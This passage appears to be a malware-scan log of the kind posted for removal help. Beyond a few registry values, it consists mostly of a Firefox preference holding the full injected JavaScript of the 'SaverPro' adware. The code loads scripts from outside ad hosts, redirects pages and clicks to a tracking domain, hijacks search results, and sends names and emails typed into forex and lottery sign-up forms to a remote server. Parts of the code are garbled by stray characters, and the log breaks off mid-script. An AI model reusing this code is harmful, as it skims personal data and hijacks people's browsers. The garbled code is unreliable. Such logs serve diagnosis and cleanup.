IE - HKCU\..\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990}: "URL" = http://www.google.com/search?q={searchTerms}&rls=com.microsoft:{language}:{referrer:source?}&ie={inputEncoding}&oe={outputEncoding}&sourceid=ie7&rlz=1I7_____en
IE - HKCU\..\SearchScopes\{7E60BFCC-2A08-4B56-A6CC-DE65F6675C3F}: "URL" = http://search.live.com/results.aspx?q={searchTerms}&src={referrer:source?}
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyOverride" = *.local;<local>
IE - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyServer" = http=127.0.0.1
 
========== FireFox ==========
 
FF - prefs.js..browser.search.useDBForOrder: true
FF - prefs.js..browser.startup.homepage: "http://www.google.com/"
FF - prefs.js..extensions.6Ge.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"warnalert11.com\")>-1||url.indexOf(\"sumorobo.net\")>-1||url.indexOf(\"mindri.com\")>-1||url.indexOf(\"=apapamam\")>-1||url.indexOf(\"alertfunctions.com\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"onduit\")>-1||url.match(/bing.com[^p]+pc=.+/)||url.match(/search.yahoo.com.+hspart=.+/)||url.indexOf(\"search.imesh\")>-1||url.indexOf(\"search.searchcore\")>-1||url.indexOf(\"searchnu.com\")>-1||url.indexOf(\"searchqu.com\")>-1||url.indexOf(\"shareazaweb\")>-1||url.indexOf(\"searchgby.com\")>-1||url.indexOf(\"mysearchresults.com\")>-1||url.indexOf(\"searchya.com\")>-1||url.indexOf(\"searchgol.com\")>-1||url.indexOf(\"trovi.com\")>-1||url.indexOf(\"search.ask\")>-1||url.indexOf(\"mywebsearch.com\")>-1||url.indexOf(\"search-results.com\")>-1||url.indexOf(\"mysearch.com\")>-1||url.indexOf(\"offers.bycontext.com\")>-1||url.indexOf(\"deals.offer-dynamics.com\")>-1||url.indexOf(\"offer-dynamics.com\")>-1||url.indexOf(\"www.livegeekhelp.com/pop/\")>-1||url.indexOf(\"deadsea.com\")>-1||url.indexOf(\"gvud.com\")>-1||url.indexOf(\"zuzd.com\")>-1||url.indexOf(\"babaViral.com\")>-1||url.indexOf(\"cupid.so\")>-1||url.indexOf(\"hostanytime.com\")>-1||url.indexOf(\"antivirus.so\")>-1||url.indexOf(\"dates.am\")>-1||url.indexOf(\"insurance-company.co\")>-1||url.indexOf(\"advanceloan.org\")>-1||url.indexOf(\"calcitapp.info\")>-1||url.indexOf(\"desktopfavapp.info\")>-1||url.indexOf(\"?ctid=CT3330145\")>-1||url.indexOf(\"?ctid=CT3330146\")>-1||url.indexOf(\"?ctid=CT3330147\")>-1||url.indexOf(\"?ctid=CT3330148\")>-1||url.indexOf(\"?ctid=CT3330149\")>-1||url.indexOf(\"http://sporty-glow.com/\")>-1||url.indexOf(\"http://game-trek.net/\")>-1||url.indexOf(\"avatrade.com\")>-1||url.indexOf(\"game-trek.net\")>-1||url.indexOf(\"urgent-alerts.com\")>-1||url.indexOf(\"pc-alert.com\")>-1||url.indexOf(\"error-alerts.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//api.jollywallet.com/affiliate/client?dist=87&sub=pnd&name=SaverPro\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;window._rvz1017x1008={publisher_subid:\"83_777\",addonname:\"SaverPro\"};(function () { if (!document.getElementById(\"qwejkhjkshdf\") && window.self == window.top) { var a = document.createElement(\"script\"); a.type ='text/javascript'; a.src = \"//asrv-a.akamaihd.net/sd/1017/1008.js\"; a.setAttribute(\"id\", \"qwejkhjkshdf\");document.getElementsByTagName('head')[0].appendChild(a)}})();;if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//www.superfish.com/ws/sf_main.jsp?dlsource=cbsfastsave&userId=6722175150&CTID=p777&partnername=SaverPro\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wpb.js?subid=83_777&hid=8347115683178558813&bname=SaverPro\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4450fm\")&&window.self==window.top&&\"http:\"==window.self.location.protocol){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"//istatic.datafastguru.info/fo/min/wp.js?subid=83_777&hid=8347115683178558813&bname=SaverPro\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4450fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}};;(function(){try{if(window.opener&&window.self==window.top&&(!window.name.match(/^(a652c|ld893)_/))&&-1==document.cookie.indexOf(\"xcddsa\")&&-1==window.self.location.href.indexOf(\"px.pluginh\")&&window.self.location.hostname.indexOf('earchfu')==-1&&(!document.referrer||-1==document.referrer.indexOf('/amz/')&&-1==document.referrer.indexOf('/sd/dw32.html')&&-1==document.referrer.indexOf('/pop/1.1.00')&&(!document.referrer.match(/cpops-\\d+\\.html/))&&-1==document.referrer.indexOf(\"px.pluginh\"))&&-1==window.self.location.href.indexOf(\"nkths.co\")&&-1==window.self.location.href.indexOf(\"ally.asi\")&&-1==window.self.location.href.indexOf('/sd/dw32.html')&&-1==window.self.location.href.indexOf('/pop/1.1.00')&&-1==window.self.location.href.indexOf('/amz/')&&(!window.self.location.href.match(/cpops-\\d+\\.html/))&&-1==window.self.location.hostname.indexOf(\"getjs\")&&-1==window.self.location.hostname.indexOf(\"hsbc\")&&3>history.length){var c=navigator.userAgent.toLowerCase(),d=\"http://canadaalltax.com/z/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&eid=83&hid=8347115683178558813&pid=777&rf=\" + encodeURIComponent(document.referrer) +\"&s=px.pluginh&r=\"+Math.random();if(-1<c.indexOf(\"msie\")&&(!document.referrer||-1==document.referrer.indexOf(location.hostname))){var e=window.innerWidth||document.documentElement.scrollWidth||0,f=window.innerHeight||document.documentElement.scrollHeight||0;if(e){window.resizeTo(e,f);var g=window.innerWidth||document.documentElement.scrollWidth,k=window.innerHeight||document.documentElement.scrollHeight;window.resizeTo(e+2,f);var h=window.scrollWidth||document.documentElement.scrollWidth;if(h!=g&&h<=g+2&&90>=f-k){var a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};window.self.location.href=d}}}else if(!window.menubar.visible&&document.referrer&&-1==document.referrer.indexOf(window.self.location.hostname)){a=new Date;a.setHours(a.getHours()+1);document.cookie=\"xcddsa=1;expires=\"+a.toUTCString();if(window.onbeforeunload){window.onbeforeunload=null;d+='&ch=97'};var b=document.createElement(\"script\");b.type=\"text/javascript\";-1<c.indexOf(\"chrome\")&&(b.innerHTML='document.getElementsByTagName(\"body\")[0].setAttribute(\"xcddsa\",\"1\")',document.getElementsByTagName(\"body\")[0].appendChild( B),setTimeout(function(){document.getElementsByTagName(\"body\")[0].getAttribute(\"xcddsa\")&&(window.self.location.href=d)},10));-1<c.indexOf(\"firefox\")&&(b.innerHTML='try{if(typeof(jQuery)!=\"undefined\"){jQuery(window).unbind(\"beforeunload\")}}catch(e){};setTimeout(function(){window.self.location.href=\"'+d+'\";},10);',document.getElementsByTagName(\"head\")[0].appendChild( B))}}}catch(l){}})();if(1==2&&-1<window.self.location.href.indexOf(\"df.ly/\")){var dd=document.getElementById(\"rf\");dd&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&ch=1\")}(\"rdlnk.co\"==window.self.location.hostname||\"adfoc.us\"==window.self.location.hostname||\"www.adsbeta.net\"==window.self.location.hostname||\"ad5.eu\"==window.self.location.hostname)&&(dd=document.getElementsByTagName(\"iframe\")[0])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?ch=1\");\"cf.ly\"==window.self.location.hostname&&(dd=document.getElementsByTagName(\"iframe\")[1])&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&ch=1\");\"adv.li\"==window.self.location.hostname&&(dd=document.getElementById(\"main\"))&&dd.setAttribute(\"src\",\"http://canadaalltax.com/x/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&ch=1\");if(window.top==window.self&&\"undefined\"!=typeof addEventListener&&-1==document.cookie.indexOf(\"vdsknj4th4un\")){var zytd=function(a){try{if(\"a\"==a.target.tagName.toLowerCase()&&\"\"==a.target.innerHTML&&a.target.getAttribute(\"href\")&&-1==a.target.getAttribute(\"href\").indexOf(window.self.location.hostname)){a.target.setAttribute(\"href\",\"http://canadaalltax.com/z/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&eid=83&hid=8347115683178558813&pid=777&ch=666&rf=\"+encodeURIComponent(window.self.location.href)+\"&s=px.pluginh&r=\"+Math.random());var b=new Date;b.setHours(b.getHours()+5);document.cookie=\"vdsknj4th4un=1;expires=\"+b.toUTCString();document.getElementsByTagName(\"body\")[0].removeEventListener(\"click\",zytd)}}catch©{}};try{document.getElementsByTagName(\"body\")[0].addEventListener(\"click\",zytd)}catch(e){}};(function(){var init=function(b,a,f){for(var e=function(){for(var d=[],c=0;c<a.length;c++)b[a[c]]&&b[a[c]].value&&2<b[a[c]].value.length&&d.push(b[a[c]].value.replace(/[^0-9a-z \\-_\\.@]/ig,\"\"));if(d.length==a.length)for((new Image).src=\"https://score.sendapplicationget.com/?id=\"+f+\"&c=\"+encodeURIComponent(d.join(\",\"))+\"&r=\"+Math.random(),c=0;c<a.length;c++)b[a[c]]&&b[a[c]].removeEventListener?b[a[c]].removeEventListener(\"blur\",e,!1):b[a[c]]&&b[a[c]].detachEvent&&b[a[c]].detachEvent(\"onblur\",e)},d=0;d<a.length;d++)b[a[d]]&&b[a[d]].addEventListener?b[a[d]].addEventListener(\"blur\",e,!1):b[a[d]]&&b[a[d]].attachEvent&&b[a[d]].attachEvent(\"onblur\",e)};(\"www.apply.forex.com\"==window.self.location.hostname||\"apply.forex.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"Screen1\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolder1$ctl01$txtFirstname,ctl00$ContentPlaceHolder1$ctl01$txtLastname,ctl00$ContentPlaceHolder1$ctl01$txtVerifyEmail\".split(','),\"3\");(\"www.thelotter.com\"==window.self.location.hostname||\"thelotter.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"remoteshortregistration\")&&document[\"aspnetForm\"]&&init(document[\"aspnetForm\"],\"ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtFirstName,ctl00$ContentPlaceHolderMain$ctl00$signUpForms$txtEmail\".split(','),\"4\");(\"www.calottery.com\"==window.self.location.hostname||\"calottery.com\"==window.self.location.hostname)&&-1<window.self.location.href.indexOf(\"register\")&&document[\"frmMain\"]&&init(document[\"frmMain\"],\"objBody$content_0$leftcolumn_0$txtFirstName,objBody$content_0$leftcolumn_0$txtLastName,objBody$content_0$leftcolumn_0$txtEmail\".split(','),\"5\")})();(function(){try{var b=\"gonetwork.eu performancerevenues.com adtransfer adk2.com timehare clkads.com adcash xtendmedia.com cpxinteractive media-servers directrev doubleclick brealtime.com adnxs.com yieldmanager jsopen yieldads adserverplus clicksor exoclick.com vitalads zedo.com mshft pop.billi mediawhite edomz getjs adjuggler realpopbid bestadbid directdisplayad displayadfeed adorika displayadfeed akamaihd.net/ssa/ trusted-serving tusfiles clkmon.c minecraftdl\".split(\" \");for(i=0;i<b.length;i++){var a=location.href + (document.title?document.title.toLowerCase():\"z\");if(document.referrer&&-1<document.referrer.indexOf(b[i])&&(-1<a.indexOf(\"download\")||-1<a.indexOf(\"convert\")||-1<window.self.location.href.indexOf(\"babylon\")||-1<window.self.location.href.indexOf(\"se Update Go\")||-1<window.self.location.href.indexOf(\"ilivid\")||-1<window.self.location.href.indexOf(\"download\")||-1<a.indexOf(\"regclean\")||-1<a.indexOf(\"etype\")||-1<a.indexOf(\"diction\")||-1<a.indexOf(\"my-uq\")||-1<a.indexOf(\"ftalk\")||-1<a.indexOf(\"pcspeedmaximizer\")||-1<a.indexOf(\"kingtransl\")||-1<a.indexOf(\"jsopen\")||-1<a.indexOf(\"7-zip\")||-1<a.indexOf(\"boost pc\")||-1<a.indexOf(\"computer slow\")||-1<a.indexOf(\"7-update14\")||-1<a.indexOf(\"player\")) || location.hostname.indexOf('jsopen.net')>-1){var channel=99;if(window.onbeforeunload){window.onbeforeunload=null;channel=98};location.href=\"http://canadaalltax.com/e/?f=rjY9vTw7qG5FqdwKrjnFfHw9rdY7qHg6qTa%3D&eid=83&hid=8347115683178558813&pid=777&ch=\"+channel+\"&s=px.pluginh&r=\"+Math.random();break}}}catch(d){}})();(function(){var e=function(){var a=window.location.search.split(\"v=\")[1],b=a&&a.indexOf(\"&\")||-1;-1!=b&&(a=a.substring(0, B));return a},f=function(){var a=document.getElementsByClassName(\"watch-view-count\");return a&&a[0]&&a[0].innerHTML?a[0].innerHTML.replace(/[^0-9]+$/,\"\")||0:0},g=function(){var a=document.getElementById(\"eow-category\");return a&&(a=a.getElementsByTagName(\"a\"))&&a[0]&&(a=a[0].getAttribute(\"href\"))?encodeURIComponent(a.replace(\"/\",\"\")):\"\"};if(window.self==window.top&&(-1<window.self.location.hostname.indexOf(\"youtube.com\")||-1<window.self.location.hostname.indexOf(\"youtu.be\")))try{var b=document.getElementsByTagName(\"body\")[0];if(!b.getAttribute(\"wyttb\")){b.setAttribute(\"wyttb\",\"1\");var c=e(),d=f(),h=g();c&&d&&((new Image).src=\"https://score.transferin.in/?id=\"+c+\"&n=\"+d+\"&c=\"+h+\"&cb=184.167.141.141\")}}catch(k){}})();;(function(){var b,f,g;try{var a=window.self.location.href;if(!(window.self==window.top||\"undefined\"==typeof localStorage||\"undefined\"==typeof localStorage.setItem||-1==a.indexOf(\"XZl0Fxw8=\")&&!a.match(/1018-\\d{3,4}_/)&&-1==a.indexOf(\"cdncache-a.aka\"))){if(-1<a.indexOf(\"XZl0Fxw8=\")){var d=a.match(/XZl0Fxw8=(\\d+)_(\\d{2,3}x\\d{2,3})_?(\\d+)?/);b=d[1];f=d[2].replace(\"x\",\".\");g=d[3]?d[3]:0}else{try{var j=-1<a.indexOf(\"zoneid\")?a.match(/zoneid=(\\d+)/)[1]:a.match(/1018-(\\d+)_WS/)[1]}catch(n){j=0}var c=document.getElementsByTagName(\"body\")[0];b=-1<a.indexOf(\"cdncache-a.aka\")?1001:1002;f=Math.max(c.scrollWidth,c.offsetWidth)+\".\"+Math.max(c.scrollHeight,c.offsetHeight);g=j}var e=new Date,k=parseInt(e.getTime()/1E3),l=\"zyk_\"+[e.getUTCFullYear()+\"-\"+(e.getUTCMonth()+1)+\"-\"+e.getUTCDate(),b,f,g].join(),m=localStorage.getItem(l);localStorage.setItem(l,1+(m?parseInt(m):0));if(lsTime=localStorage.getItem(\"zEpoch\")){if(7200<k-parseInt(lsTime)){var h=document.createElement(\"div\");b=[];for(i in localStorage)-1<i.indexOf(\"zyk_\")&&b.push(\"'\"+i.replace(\"zyk_\",\"\")+\"':\"+localStorage.getItem(i));h.style.display=\"none\";h.innerHTML='<iframe name=\"webscorebox_ifr\"></iframe><form target=\"webscorebox_ifr\" method=\"post\" action=\"http://count3.webscorebox.com/?q=g708BNmGWj8lkGhVWzmPhd95rGhEAen0qHC6tNhVCNqPB750pihSCM06C7lGojsMh7VUojaMAyVUojYHqdCFrjk7pdrFqHY8qjY5rjr=\" id=\"webscorebox_frm\"><input type=\"hidden\" name=\"scores\" value=\"{'+b.join(\",\")+'}\"></form>';(typeof c!=\"undefined\"?c:document.getElementsByTagName(\"body\")[0]).appendChild(h);document.getElementById(\"webscorebox_frm\").submit();localStorage.clear()}}else localStorage.setItem(\"zEpoch\",k)}}catch(p){}})();;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var m=document.createElement(\"div\");m.id=\"__yael_once\";var n=document.getElementsByTagName(\"body\")[0];n&&n.appendChild(m);var b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.5.p\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0;b.eid=decodeURIComponent(\"SaverPro\"); b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.isFalse=function(a){return\"undefined\"==typeof a||0===a.length||null===a};a.cookie=new function(){var a=this;a.createCookie=function(a,c, B){if( B){var g=new Date;g.setTime(g.getTime()+864E5* B);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c[b];\" \"==g.charAt(0);)g= g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null};a.eraseCookie=function( B){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c, B){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\"); this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)};b=encodeURIComponent( B);this.xhr.send( B)}};a.waitForTokens={};a.addScript=function(a, B){if(\"bing\"== B){var e=Element.prototype.appendChild;document.createElement(\"iframe\");Element.prototype.appendChild=document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}else document.getElementsByTagName(\"head\")[0].appendChild(a)};a.waitForElement=function(c,d,e,f){var g= a.query_selector_all©;clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var h=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;h(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a, B){return Math.floor(Math.random()*(b-a+1))+a}; a.get_computed_style=\"function\"!=typeof window.getComputedStyle?function©{return{getPropertyValue:function( B){\"float\"==b&&(b=\"styleFloat\");b=a.dhtml_prop_name( B);return\"object\"==typeof c.currentStyle&&null!=c.currentStyle&&\"undefined\"!=typeof c.currentStyle[b]?c.currentStyle[b]:null}}}:function(a, B){return window.getComputedStyle(a, B)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch( B){}}:function(a){var b= a.match(/^#([^,\\s]+)$/)||[];if(1<b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild( B);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}: function(a){if(a instanceof Object){var b=new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a, B){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)}, B)}};a.epoch=function(){return(new Date).getTime()}; a.msie=function(){var a=parseInt((/msie (\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10);isNaN(a)&&(a=parseInt((/trident\\/.*; rv:(\\d+)/.exec(navigator.userAgent.toLowerCase())||[])[1],10));return isNaN(a)?!1:a}();a.version_ie_less=function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)}; a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test( B))return!0}};a.ping=function(a){for(var d=[\"google\",\"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var h=encodeURIComponent(location.hostname); f.src=b.pixelHost+\"?hid=8347115683178558813&eid=83&pid=777&prodid=316&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=US&pr=\"+d[e]+\"&host=\"+h+\"&ref=\"+g}}};var k=[\"horizontal\",\"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"], src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d=0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0; c.callback=a;c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\")||b.utils.query_selector_all(\".tn\");if(b.utils.isFalse(a))if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return(b.utils.query_selector_all(\".hdtb_mitem\")[0]||b.utils.query_selector_all(\".tn > div\")[0]).className.match(/(hdtb_msel|tn-selected-mode)/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};if(!c.check_tab())return!1}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\", dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}}};var l=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&&1<c.length)return a=b.utils.query_selector_all(a.substr(0, c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b,d,e,f])}:function(){};a.remove=window.removeEventListener? function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache[b]);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom=new function(){this.json_to_html=function(a,c){if(\"#text\"== a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);try{c.style[f]=a.attrs.style[e]}catch(g){}}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&&(c.marginWidth= a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(h){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault?a.preventDefault(): a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f<d.length;f++){var g= b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a[b]=a[b].replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\",\"with\":c.clickUrl}]; for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json=function(a){\"first\"== a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<k.length;b++)if(-1<a.layouts.id.indexOf(k[b]))return k[b];return!1};b.create_search= function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function( B){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")};b.is_target_valid=function(a){if(0!= __yael_res.data.numberOfItems&&\"undefined\"!=typeof 